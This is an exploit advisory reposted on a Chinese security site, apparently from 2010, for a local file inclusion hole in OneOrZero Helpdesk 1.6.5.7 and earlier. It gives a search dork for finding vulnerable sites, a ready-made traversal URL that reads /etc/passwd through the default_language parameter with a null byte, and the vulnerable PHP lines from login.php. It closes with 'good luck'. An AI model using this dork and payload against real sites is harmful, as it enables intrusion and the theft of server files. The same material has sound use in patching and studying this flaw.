首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
来源:vfocus.net 作者: wlhaan hacker 发布时间:2010-01-04  

                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> team wlhaan hacker                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


_____________________________________________________
[ OneOrZero Helpdesk <= 1.6.5.7 ]   Local File Inclusion Vulnerability

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+]  team wlhaan Hacker     #
# [+] Dork : inurl" OneOrZero Helpdesk
#####################################################
 #############################################################################
 #  [ OneOrZero Helpdesk <= 1.6.5.7 ]   Local File Inclusion Vulnerability   #
 #############################################################################
 #
 # Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
 #          used by companies and groups large and small to manage information and requests in their organization. "
 #
 # Script site: http://www.oneorzero.com/
 # Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
 #
 # [LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd%00
 #
 # Bug: ./oozv1657/common/login.php (line: 104)
 #
 # ...
 #    // require_once "../common/common.php";
 #    if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
 #        require_once "../lang/$default_language.lang.php";
 #    else
 #        require_once "lang/$default_language.lang.php";                            // LFI (register_globals = On, magic_quotes_gpc = Off)
 # ...
 #
 #
 ###############################################



and good luck :D

Thanks to : shooq hacker ..

#####################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component com_hotbracke
·MasterWeb Script <== 1.0 (deta
·Joomla Component com_alfresco
·PhpMySport v. 1.4 Multiple Rem
·Joomla Component com_tpjobs Bl
·pluck v 4.6.1 LFI
·Joomla Component com_countries
·Google Chrome 4.0.249.30 DoS P
·Joomla Component com_abbrev Lo
·Live TV Script SQL Injection V
·Facebook for iPhone persistent
·Joomla Bridge of Hope Template
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved